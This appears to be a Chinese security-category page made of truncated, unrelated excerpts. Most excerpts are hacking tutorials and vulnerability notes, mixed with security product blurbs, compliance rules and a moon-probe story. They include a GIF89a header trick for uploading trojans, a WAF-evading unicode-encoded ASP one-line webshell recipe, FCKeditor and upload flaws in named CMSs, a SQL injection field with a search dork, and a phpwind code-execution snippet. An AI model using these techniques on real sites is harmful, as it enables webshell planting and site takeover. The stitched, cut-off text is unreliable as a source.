分类： 安全

　　本文转载自“人民网”，原文地址是：http://it.people.com.cn/GB/42892/114555/115746/11818779.html，当然，如果您打不开了——很正常，因为本文作者知道的太多了……Now,Start!

　　因为众所周知的原因，最不靠谱的当然是 QQ，所以如果你有秘密或者艳照之类，千万不要通过 QQ 传递。MSN 的通讯是明文未加密的，也不是很靠谱，不过

　　1、文件头+GIF89a法。（php）gif 文件头欺骗，gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。 而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。

　　2、使用edjpgcom工具向图片注入代码。（php）

　　3、cmd命令下c

影响版本：最新 Version : 5.1.0 及以前所有版本
官方地址：http://www.my-ccms.com/
漏洞类型：文件上传
漏洞描述：MY-CCMS 美易企业内容管理系统，上传页过滤不严导致asp\aspx\cer等脚本文件上传漏洞。
漏洞分析：

　　内控合规需求分析

　　当今的证券行业在IT信息安全领域面临比以往更为复杂的局面，日益迫切的信息系统审计和内控、以及持续增强的业务持续性需求，对证券行业的日志审计提出了明确的要求：

　　1) 《证券公司内部控制指引》第一百一十七条要求“证券公司应保证信息系统日志的完备性，确保所有重大修改被完整地记录，确保开启审计留痕功能”。

　　2) 证监会要求各证券单位“应建立对关键网络、安全设备和服务器日志定期检查和分析的制度。各单位应定期人工或采取软件分析方式对关键网络设备、安全设备和服务器日志进行检查和详尽的分析，通过定期对日志进行分析和总结，及时了解网络状况、设备运行状况，发现薄弱环节，及时整改，形成记录”。
...

　　月球是地球的唯一天然卫星，它与地球有着密切的演化联系。月球是人类走向太空的第一步，因此登陆月球也一直是我们中华民族的梦想，随着嫦娥二号的顺利升空，我们又离这一目标更近了一步。

　　10月1日嫦娥二号火箭顺利点火升空，截止现在，嫦娥二号已经制动成功，进入100公里工作轨道，嫦娥二号将拍摄月球表面影象、获取极区表面数据，为嫦娥三号在月球软着陆做好准备。

　　嫦娥探月工程是一项庞大的工程，它不仅

现在有不少服务器加了web的防火墙，用来过滤含asp/jsp/php的网马代码，全部用空格替换，
比较讨厌，不过后来刚好想到以前的一句话时候的unicode编码，那就也搞一个吧。

1.新建一个mdb
2.建表，考入：┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
　（实际是<% execute request("a")%>）
3.改后缀为asp/asa
4.上传
5.一句话客户端或者菜刀连接

FROM http://hi.baidu.com/it_security/blog/item/976f6ddbbce719d5b6fd4882.html...

　　KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统，前台全部静态化处理，新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力，现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点，特别是针对比较懒的站长。
　　漏洞算不上0day，但是却具有0day的危害效果，主要是因管理为对后台路径和编辑器路径做更改，系统是使用FCKeditor编辑器，这个编辑器的漏洞大家都比较熟悉了，下面就给出具体利用方法。
　　利用前提：管理员未更改后台路径以及FCKeditor编辑器路径做更改。
...

从zhenker的百度空间转转过来的，游侠刚测试了下，可以用！OK , Let's Go !

UCenter Home 2.0 shop插件漏洞都叫做DZ 0DYAY了。真杯具。

注入页: shop.php
注入字段: (?)ac=view&shopid=
关键词: inurl:shop.php?ac=view&shopid=

　　1 前言
　　目前信息化程度不断深入，极大推动了社会进步。同时由于信息数据易复制性和网络开发性也给信息数据的完整性、保密性、可靠性、可用性带来巨大威胁。
　　深圳信宏四季科技有限公司所研发的SecEInfo（安极）信息安全系统系列产品是以“信息数据安全为中心”，以“可信的人在可信的计算机上通过可信的网络访问单位核心数据资源为目标”，从“服务器数据保护、网络安全管理、终端主机文档加密管理、身

　　【报告概要】

　　2010年1月至6月间，木马、钓鱼欺诈网站是中国网民面临的主要安全威胁。以不良网址导航站、不良下载站、钓鱼欺诈网站为代表的“流氓网站”群体正在形成一个庞大灰色利益链，互联网安全问题开始进入“流氓网站”时代。以下为2010年上半年中国互联网安全六大特点：

　　1、360安全卫士、360杀毒、360木马防火墙、360系统急救箱、360帐号保险箱等360系列产品共截获各

　 神州数码网络公司针对电子政务提出了S.A.F.E解决方案集，它由四个部分组成：Safe（安全）、Availability（可靠)、multi-Function（多功能）、Easy-use（易用）。

1、Safe---符合等级保护要求的电子政务办公网方案
1.1 电子政务网络结构
　　按照《国家电子政务标准化指南》相关要求，三级以上网络属于涉密网络，网络需要分为政务涉密网、政务内网、政务外网，各网络之间通过安全设备进行隔离。在本建议书中，根据相关标准要求，只对政务内网和政务外网进行规划、设计，其中：
...

简要描述：
phpwind较高版本论坛中存在一个严重的漏洞，成功利用该漏洞可以远程执行任意php代码，影响phpwind 7和phpwind 8
详细说明：
pw_ajax.php中的
[CODE_LITE]
} elseif （$action == 'pcdelimg‘） {
InitGP（array（'fieldname','pctype’））；
InitGP（array（‘tid','id’），2）；
if （！$tid || !$id || !$fieldname || !$pctype） {
...

　　1操作系统安全加固

　　在操作系统底层利用信任链机制，对系统中所有装载的可执行文件代码（例如，EXE、DLL、SYS、COM等）进行严格的控制，所有可执行文件代码在加载运行之前都需要先经过检验，只有通过验证的代码才可以加载，这种方式可以有效阻止恶意代码的运行，从而有效保障操作系统自身的完整性和可用性不被破坏。

　　验证方法为：首先为系统制定可信白名单，即允许执行代码的hash，在进程装载二进制代码之前首先计算其hash值，并与可信白名单进行比较，不在白名单中的一概不允许执行，这样既可以防止恶意代码运行，又可以防止恶意代码依附其他系统或应用程序运行，确保执行代码的真实性和完整性，同时效率上不会有明显影响。
...

很多朋友都比较关心现在的“深度检查取证工具”能做到什么样的程度。其实这类软件一般就几个主要的项目：上网记录检查、文件操作记录、存储介质检查。

　　日前有媒体报道，截至今年5月份，我国大陆地区被篡改网站的数量为2748个，其中代号为“Fatal”、“HEXB00T3R”和“aGReSiF”的攻击者对大陆政府网站进行了大量篡改。我国香港被篡改的网站数量为30个，较4月份增长了9个;我国台湾被篡改的网站数量为44个，较4月份增长了35个……

　　相信面对如此近乎疯狂的网络攻击行为，各网站也都采取了必要的安全防护措施，但为何采取防护措施的